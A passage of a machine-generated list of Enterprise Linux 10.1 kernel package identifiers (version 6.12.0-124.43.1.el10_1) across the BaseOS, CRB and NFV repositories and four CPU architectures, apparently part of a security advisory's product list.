"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
